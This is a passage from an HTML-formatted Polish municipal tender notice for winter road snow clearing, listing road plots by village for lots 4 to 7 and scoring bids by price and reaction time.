jest:<br/>•	Prowadzić odpowiednią dokumentację wykonywanych usług – raport pracy sprzętu, określającą terminy (daty i czas), organizować prace związane z przedmiotem umowy w sposób umożliwiający należyte wykonanie usługi i bez zakłóceń w ruch drogowym;<br/>•	Stosować się do zaleceń Zamawiającego związanych z realizacją przedmiotu umowy.<br/>Wykonawca ponosi pełną odpowiedzialność za wykonywane usługi wynikające z realizacji zamówienia oraz zobowiązuje się pokryć wszelkie szkody osób trzecich wynikłe z niewykonania lub nienależytego wykonania powierzonych mu czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>a)	Cena (C) – 60 % <br/>b)	Czas reakcji (R) – 40%<br/>1.1. Kryterium Cena (C) - oferta z najniższą ceną za realizację przedmiotu zamówienia otrzyma maksymalną liczbę 60 punktów, natomiast pozostałe oferty uzyskają wartość punktową wyliczoną wg poniższego wzoru:<br/>C= Cmin / Cb x 60 = … pkt<br/>C - liczba punktów w kryterium Cena <br/>Cmin - najniższa cena ofertowa w zbiorze ofert podlegających ocenie<br/>Cb - cena ofertowa ocenianej oferty<br/>1.2.	Kryterium Czas reakcji (R) – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów za zaoferowany krótszego czasu reakcji na zgłoszenie Zamawiającego. Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg w danym regionie, a rozpoczęciem wykonywania tych usług przez Wykonawcę. W tym kryterium, Zamawiający przyzna Wykonawcy dodatkowe punkty (max. 40 pkt), wg następującego wzoru: <br/>R = (Rmax – Rb) / (Rmax – Rmin) x 40 =… pkt<br/>R - ilość przyznanych pkt w ramach kryterium<br/>Rb- czas podstawienia pojazdu w badanej ofercie w minutach<br/>Rmin.- minimalny czas podstawienia pojazdu określony w minutach <br/>Rmax. – maksymalny czas podstawienia pojazdu określony w minutach<br/>Minimalny czas reakcji wynosi 30 minut, a maksymalny 90 minut. <br/>Oferowany czas reakcji Wykonawca zobowiązany jest zamieścić w ofercie (wzór - Załącznik nr 1 do SWZ). <br/>UWAGA: Oferta zawierająca czas reakcji dłuższy niż maksymalny tj. 90 minut– oferta będzie podlegała odrzuceniu. W przypadku braku podania oferowanego czasu reakcji, Zamawiający uzna, że Wykonawca zaoferował maksymalny czas wynoszący 90 minut i otrzyma 0 punktów. W przypadku zaoferowanie czasu reakcji krótszego niż minimalny 30 min Wykonawca nie otrzyma dodatkowych punktów, natomiast do umowy zostanie wpisany czas zaoferowany przez Wykonawcę.<br/>2.	Za najkorzystniejszą ofertę uznana zostanie ta, która uzyska w sumie największą liczbę punktów w oparciu o przyjęte kryteria oceny ofert (C+R).<br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas Reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rejon IV: Orłowiec, Lutynia, Wójtówka<br/>1.	Orłowiec:<br/>•	dz. 13 do budynku nr 1<br/>•	dz. 45 i 62/6 do budynków nr 11, 11a, 12<br/>•	dz. 67 do budynku nr 16<br/>•	dz. 75 do budynku nr 20<br/>•	dz. 172 i 86 do budynku nr 26a<br/>•	dz. 141 do budynku nr 27a<br/>•	dz. 160 do budynku nr 17c<br/>•	dz. 129 do budynku nr 32A<br/>•	dz. 169 do budynku nr 20<br/>•	dz. 98 do budynku nr 34<br/>•	dz. 103, 104 do budynku nr 39<br/>2.	Lutynia<br/>•	dz. 128 droga od skrzyżowania z drogą powiatową 3251D w górę wsi do ostatnich zabudowań 20, 21<br/>•	droga od skrzyżowania z drogą powiatową 3251D do zabudowań nr 1 i nowo wybudowanych droga na Ułęże<br/>3.	Wojtówka<br/>•	dz. 95/2 do zabudowań nr 22a<br/>•	dz. 97 do zabudowań nr 13<br/>•	dz. 105/1; 105/2; 106 do zabudowań nr 8, 16, 18, 20, 22<br/>•	dz. 113 do zabudowań nr 3 oraz nowo wybudowanych powyżej budynków<br/><br/>Zakres prac oraz zasady ZUD<br/>•	Czynności zimowego utrzymania dróg wykonywane będą w okresie 01.12.2025r. do 31.03.2026r. Zamawiający informuje, że czas trwania umowy może ulec zmianie ze względu na warunki atmosferyczne; <br/>•	Czynności związane z zimowym utrzymaniem dróg powinny być wykonywane w sposób gwarantujący osiągnięcie i utrzymanie właściwych standardów, przy spełnieniu wymagań dotyczących ochrony środowiska, bezpieczeństwa i higieny pracy, standardów sanitarnych oraz wymagań wynikających z innych obowiązujących przepisów.<br/>Wykonawca obowiązany jest:<br/>•	Prowadzić odpowiednią dokumentację wykonywanych usług – raport pracy sprzętu, określającą terminy (daty i czas), organizować prace związane z przedmiotem umowy w sposób umożliwiający należyte wykonanie usługi i bez zakłóceń w ruch drogowym;<br/>•	Stosować się do zaleceń Zamawiającego związanych z realizacją przedmiotu umowy.<br/>Wykonawca ponosi pełną odpowiedzialność za wykonywane usługi wynikające z realizacji zamówienia oraz zobowiązuje się pokryć wszelkie szkody osób trzecich wynikłe z niewykonania lub nienależytego wykonania powierzonych mu czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>a)	Cena (C) – 60 % <br/>b)	Czas reakcji (R) – 40%<br/>1.1. Kryterium Cena (C) - oferta z najniższą ceną za realizację przedmiotu zamówienia otrzyma maksymalną liczbę 60 punktów, natomiast pozostałe oferty uzyskają wartość punktową wyliczoną wg poniższego wzoru:<br/>C= Cmin / Cb x 60 = … pkt<br/>C - liczba punktów w kryterium Cena <br/>Cmin - najniższa cena ofertowa w zbiorze ofert podlegających ocenie<br/>Cb - cena ofertowa ocenianej oferty<br/>1.2.	Kryterium Czas reakcji (R) – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów za zaoferowany krótszego czasu reakcji na zgłoszenie Zamawiającego. Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg w danym regionie, a rozpoczęciem wykonywania tych usług przez Wykonawcę. W tym kryterium, Zamawiający przyzna Wykonawcy dodatkowe punkty (max. 40 pkt), wg następującego wzoru: <br/>R = (Rmax – Rb) / (Rmax – Rmin) x 40 =… pkt<br/>R - ilość przyznanych pkt w ramach kryterium<br/>Rb- czas podstawienia pojazdu w badanej ofercie w minutach<br/>Rmin.- minimalny czas podstawienia pojazdu określony w minutach <br/>Rmax. – maksymalny czas podstawienia pojazdu określony w minutach<br/>Minimalny czas reakcji wynosi 30 minut, a maksymalny 90 minut. <br/>Oferowany czas reakcji Wykonawca zobowiązany jest zamieścić w ofercie (wzór - Załącznik nr 1 do SWZ). <br/>UWAGA: Oferta zawierająca czas reakcji dłuższy niż maksymalny tj. 90 minut– oferta będzie podlegała odrzuceniu. W przypadku braku podania oferowanego czasu reakcji, Zamawiający uzna, że Wykonawca zaoferował maksymalny czas wynoszący 90 minut i otrzyma 0 punktów. W przypadku zaoferowanie czasu reakcji krótszego niż minimalny 30 min Wykonawca nie otrzyma dodatkowych punktów, natomiast do umowy zostanie wpisany czas zaoferowany przez Wykonawcę.<br/>2.	Za najkorzystniejszą ofertę uznana zostanie ta, która uzyska w sumie największą liczbę punktów w oparciu o przyjęte kryteria oceny ofert (C+R).<br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas Reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rejon V: Skrzynka<br/>Skrzynka:<br/>•	dz. 224/5, 232/1, 232/2, 234, 263 235/1 od przystanku PKS w górę wsi do końca miejscowości (plus parking pod kościołem)<br/>•	dz.181/3 (obręb Trzebieszowice); 267/1, 269/1 i 268 od DP3258 do DP3258 do zabudowań 69, 70, 71, 71A <br/>•	dz. 281 do nr 10<br/>•	dz. 258 od drogi gminnej nr 262 do gospodarstwa nr 49 <br/>•	dz. 262, 264 od DP3258 do drogi 234 (obok kościoła) <br/>•	dz. 330/13, 330/3, 330/21 drogi po byłym PGR<br/><br/>Zakres prac oraz zasady ZUD<br/>•	Czynności zimowego utrzymania dróg wykonywane będą w okresie 01.12.2025r. do 31.03.2026r. Zamawiający informuje, że czas trwania umowy może ulec zmianie ze względu na warunki atmosferyczne; <br/>•	Czynności związane z zimowym utrzymaniem dróg powinny być wykonywane w sposób gwarantujący osiągnięcie i utrzymanie właściwych standardów, przy spełnieniu wymagań dotyczących ochrony środowiska, bezpieczeństwa i higieny pracy, standardów sanitarnych oraz wymagań wynikających z innych obowiązujących przepisów.<br/>Wykonawca obowiązany jest:<br/>•	Prowadzić odpowiednią dokumentację wykonywanych usług – raport pracy sprzętu, określającą terminy (daty i czas), organizować prace związane z przedmiotem umowy w sposób umożliwiający należyte wykonanie usługi i bez zakłóceń w ruch drogowym;<br/>•	Stosować się do zaleceń Zamawiającego związanych z realizacją przedmiotu umowy.<br/>Wykonawca ponosi pełną odpowiedzialność za wykonywane usługi wynikające z realizacji zamówienia oraz zobowiązuje się pokryć wszelkie szkody osób trzecich wynikłe z niewykonania lub nienależytego wykonania powierzonych mu czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>a)	Cena (C) – 60 % <br/>b)	Czas reakcji (R) – 40%<br/>1.1. Kryterium Cena (C) - oferta z najniższą ceną za realizację przedmiotu zamówienia otrzyma maksymalną liczbę 60 punktów, natomiast pozostałe oferty uzyskają wartość punktową wyliczoną wg poniższego wzoru:<br/>C= Cmin / Cb x 60 = … pkt<br/>C - liczba punktów w kryterium Cena <br/>Cmin - najniższa cena ofertowa w zbiorze ofert podlegających ocenie<br/>Cb - cena ofertowa ocenianej oferty<br/>1.2.	Kryterium Czas reakcji (R) – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów za zaoferowany krótszego czasu reakcji na zgłoszenie Zamawiającego. Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg w danym regionie, a rozpoczęciem wykonywania tych usług przez Wykonawcę. W tym kryterium, Zamawiający przyzna Wykonawcy dodatkowe punkty (max. 40 pkt), wg następującego wzoru: <br/>R = (Rmax – Rb) / (Rmax – Rmin) x 40 =… pkt<br/>R - ilość przyznanych pkt w ramach kryterium<br/>Rb- czas podstawienia pojazdu w badanej ofercie w minutach<br/>Rmin.- minimalny czas podstawienia pojazdu określony w minutach <br/>Rmax. – maksymalny czas podstawienia pojazdu określony w minutach<br/>Minimalny czas reakcji wynosi 30 minut, a maksymalny 90 minut. <br/>Oferowany czas reakcji Wykonawca zobowiązany jest zamieścić w ofercie (wzór - Załącznik nr 1 do SWZ). <br/>UWAGA: Oferta zawierająca czas reakcji dłuższy niż maksymalny tj. 90 minut– oferta będzie podlegała odrzuceniu. W przypadku braku podania oferowanego czasu reakcji, Zamawiający uzna, że Wykonawca zaoferował maksymalny czas wynoszący 90 minut i otrzyma 0 punktów. W przypadku zaoferowanie czasu reakcji krótszego niż minimalny 30 min Wykonawca nie otrzyma dodatkowych punktów, natomiast do umowy zostanie wpisany czas zaoferowany przez Wykonawcę.<br/>2.	Za najkorzystniejszą ofertę uznana zostanie ta, która uzyska w sumie największą liczbę punktów w oparciu o przyjęte kryteria oceny ofert (C+R).<br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas Reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rejon VI: Konradów<br/>Konradów:<br/>•	dz. 73, 53, 63, 230 od DP3257 do zabudowań nr 1,2,3,4,5,6<br/>•	dz. 11 od DP3257 do zabudowań nr 89<br/>•	dz. 22/2 od DP3257 do zabudowań nr 11<br/>•	dz. 207 od DP3257 do zabudowań nr 80 <br/>•	dz. 170 od DP3257 do zabudowań nr 78 <br/>•	dz. 165 od DP3257 do zabudowań nr 76<br/>•	dz. 122 od DP3257 do zabudowań nr 18A<br/>•	dz. 171 od DP3257 do zabudowań nr 75<br/>•	dz. 129 od DP3257 do zabudowań na dz. 124<br/>•	dz. 436 od DP3257 do budynków mieszkalnych (ANR)<br/>•	dz. 408 od DP3257 do zabudowań nr 69,70 (wjazd)<br/>•	dz. 133/1,133/2; 393 i 394 od DP3257 do ostatnich zabudowań na dz. 399/2<br/>•	dz. 420 i 426 od DP3257 do zabudowań 27 przy Kościele<br/>•	dz. 358 od DP3257 do zabudowań nr 31<br/>•	dz. 352/1, 352/2, 352/3 od DP3257 do zabudowań na dz. 374<br/>•	dz. 271 od DP3257 do zabudowań nr 60, 61<br/>•	dz. 335 od DP3257 do zabudowań nr 41<br/>•	dz. 276 od DP3257 do zabudowań nr 55<br/>•	dz. 342 od DP3257 do zabudowań na dz. 343/2<br/>•	dz. 336 od DP3257 do zabudowań na dz. 326<br/>•	dz. 268 od DP 3257 do zabudowań nr 57 <br/>•	dz. 314 od DP3257 do zabudowań nr 44 (na dz. 317)<br/>•	dz. 309 od DP3257 do zabudowań nr 48<br/><br/>Zakres prac oraz zasady ZUD<br/>•	Czynności zimowego utrzymania dróg wykonywane będą w okresie 01.12.2025r. do 31.03.2026r. Zamawiający informuje, że czas trwania umowy może ulec zmianie ze względu na warunki atmosferyczne; <br/>•	Czynności związane z zimowym utrzymaniem dróg powinny być wykonywane w sposób gwarantujący osiągnięcie i utrzymanie właściwych standardów, przy spełnieniu wymagań dotyczących ochrony środowiska, bezpieczeństwa i higieny pracy, standardów sanitarnych oraz wymagań wynikających z innych obowiązujących przepisów.<br/>Wykonawca obowiązany jest:<br/>•	Prowadzić odpowiednią dokumentację wykonywanych usług – raport pracy sprzętu, określającą terminy (daty i czas), organizować prace związane z przedmiotem umowy w sposób umożliwiający należyte wykonanie usługi i bez zakłóceń w ruch drogowym;<br/>•	Stosować się do zaleceń Zamawiającego związanych z realizacją przedmiotu umowy.<br/>Wykonawca ponosi pełną odpowiedzialność za wykonywane usługi wynikające z realizacji zamówienia oraz zobowiązuje się pokryć wszelkie szkody osób trzecich wynikłe z niewykonania lub nienależytego wykonania powierzonych mu czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>a)	Cena (C) – 60 % <br/>b)	Czas reakcji (R) – 40%<br/>1.1. Kryterium Cena (C) - oferta z najniższą ceną za realizację przedmiotu zamówienia otrzyma maksymalną liczbę 60 punktów, natomiast pozostałe oferty uzyskają wartość punktową wyliczoną wg poniższego wzoru:<br/>C= Cmin / Cb x 60 = … pkt<br/>C - liczba punktów w kryterium Cena <br/>Cmin - najniższa cena ofertowa w zbiorze ofert podlegających ocenie<br/>Cb - cena ofertowa ocenianej oferty<br/>1.2.	Kryterium Czas reakcji (R) – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów za zaoferowany krótszego czasu reakcji na zgłoszenie Zamawiającego. Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg w danym regionie, a rozpoczęciem wykonywania tych usług przez Wykonawcę. W tym kryterium, Zamawiający przyzna Wykonawcy dodatkowe punkty (max. 40 pkt), wg następującego wzoru: <br/>R = (Rmax – Rb) / (Rmax – Rmin) x 40 =… pkt<br/>R - ilość przyznanych pkt w ramach kryterium<br/>Rb- czas podstawienia pojazdu w badanej ofercie w minutach<br/>Rmin.- minimalny czas podstawienia pojazdu określony w minutach <br/>Rmax. – maksymalny czas podstawienia pojazdu określony w minutach<br/>Minimalny czas reakcji wynosi 30 minut, a maksymalny 90 minut. <br/>Oferowany czas reakcji Wykonawca zobowiązany jest zamieścić w ofercie (wzór - Załącznik nr 1 do SWZ). <br/>UWAGA: Oferta zawierająca czas reakcji dłuższy niż maksymalny tj. 90 minut– oferta będzie podlegała odrzuceniu. W przypadku braku podania oferowanego czasu reakcji, Zamawiający uzna, że Wykonawca zaoferował maksymalny czas wynoszący 90 minut i otrzyma 0 punktów. W przypadku zaoferowanie czasu reakcji krótszego niż minimalny 30 min Wykonawca nie otrzyma dodatkowych punktów, natomiast do umowy zostanie wpisany czas zaoferowany przez Wykonawcę.<br/>2.	Za najkorzystniejszą ofertę uznana zostanie ta, która uzyska w sumie największą liczbę punktów w oparciu o przyjęte kryteria oceny ofert (C+R).<br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas Reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rejon VII: Stójków<br/>Stójków:<br/>•	dz. 63 - droga główna przez wieś Stójków <br/>•	dz. 62 od skrzyżowania drogi przez wieś do zabudowań nr 31D – 31 J (wraz z dz. 239/5)<br/>•	dz. 127 do zabudowań nr 41 oraz 41A<br/>•	dz. 16 od skrzyżowania DW392 do zabudowań na dz. 8, 13. 22 (budynki nr 14, 16, 18)<br/>•	dz. 98 od drogi 392 do dworca kolejowego<br/>•	dz.126 od wiaduktu kolejowego do dz. 102, 186, i 134/4 (budynki nr 42, 46)<br/>•	dz. 294,291,139 oraz 162 (przejazd od wiaduktu do zabudowań 41 A)<br/>•	dz. 94/1 i 99 od DW392 do DW392 (dojazd do budynków 37A, 37B i do wiaduktu kolejowego)<br/>•	dz. 6 od DW392 do zabudowań nr 15<br/>•	dz. 27 od DW392 do granicy lasu (kierunek Karpno)<br/>•	dz. 36 od drogi głównej przez wieś do zabudowań nr 24 B, C, D<br/>•	dz. 48 do budynku nr 27<br/>•	dz. 49 do budynku nr 27B i dalej do torów kolejowych<br/><br/><br/>Zakres prac oraz zasady ZUD<br/>•	Czynności zimowego utrzymania dróg wykonywane będą w okresie 01.12.2025r. do 31.03.2026r. Zamawiający informuje, że czas trwania umowy może ulec zmianie ze względu na warunki atmosferyczne; <br/>•	Czynności związane z zimowym utrzymaniem dróg powinny być wykonywane w sposób gwarantujący osiągnięcie i utrzymanie właściwych standardów, przy spełnieniu wymagań dotyczących ochrony środowiska, bezpieczeństwa i higieny pracy, standardów sanitarnych oraz wymagań wynikających z innych obowiązujących przepisów.<br/>Wykonawca obowiązany jest:<br/>•	Prowadzić odpowiednią dokumentację wykonywanych usług – raport pracy sprzętu, określającą terminy (daty i czas), organizować prace związane z przedmiotem umowy w sposób umożliwiający należyte wykonanie usługi i bez zakłóceń w ruch drogowym;<br/>•	Stosować się do zaleceń Zamawiającego związanych z realizacją przedmiotu umowy.<br/>Wykonawca ponosi pełną odpowiedzialność za wykonywane usługi wynikające z realizacji zamówienia oraz zobowiązuje się pokryć wszelkie szkody osób trzecich wynikłe z niewykonania lub nienależytego wykonania powierzonych mu czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>a)	Cena (C) – 60 % <br/>b)	Czas reakcji (R) – 40%<br/>1.1. Kryterium Cena (C) - oferta z najniższą ceną za realizację przedmiotu zamówienia otrzyma maksymalną liczbę 60 punktów, natomiast pozostałe oferty uzyskają wartość punktową wyliczoną wg poniższego wzoru:<br/>C= Cmin / Cb x 60 = … pkt<br/>C - liczba punktów w kryterium Cena <br/>Cmin - najniższa cena ofertowa w zbiorze ofert podlegających ocenie<br/>Cb - cena ofertowa ocenianej oferty<br/>1.2.	Kryterium Czas reakcji (R) – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów za zaoferowany krótszego czasu reakcji na zgłoszenie Zamawiającego. Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg w danym regionie, a rozpoczęciem wykonywania tych usług przez Wykonawcę. W tym kryterium, Zamawiający przyzna Wykonawcy dodatkowe punkty (max. 40 pkt), wg następującego wzoru: <br/>R = (Rmax – Rb) / (Rmax – Rmin) x 40 =… pkt<br/>R - ilość przyznanych pkt w ramach kryterium<br/>Rb- czas podstawienia pojazdu w badanej ofercie w minutach<br/>Rmin.- minimalny czas podstawienia pojazdu określony w minutach <br/>Rmax. – maksymalny czas podstawienia pojazdu określony w minutach<br/>Minimalny czas reakcji wynosi 30 minut, a maksymalny 90 minut. <br/>Oferowany czas reakcji Wykonawca zobowiązany jest zamieścić w ofercie (wzór - Załącznik nr 1 do SWZ). <br/>UWAGA: Oferta zawierająca czas reakcji dłuższy niż maksymalny tj. 90 minut– oferta będzie podlegała odrzuceniu. W przypadku braku podania oferowanego czasu reakcji, Zamawiający uzna, że Wykonawca zaoferował maksymalny czas wynoszący 90 minut i otrzyma 0 punktów. W przypadku zaoferowanie czasu reakcji krótszego niż minimalny 30 min Wykonawca nie otrzyma dodatkowych punktów, natomiast do umowy zostanie wpisany czas zaoferowany przez Wykonawcę.<br/>2.	Za najkorzystniejszą ofertę uznana zostanie ta, która uzyska w sumie największą liczbę punktów w oparciu o przyjęte kryteria oceny ofert (C+R).<br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas 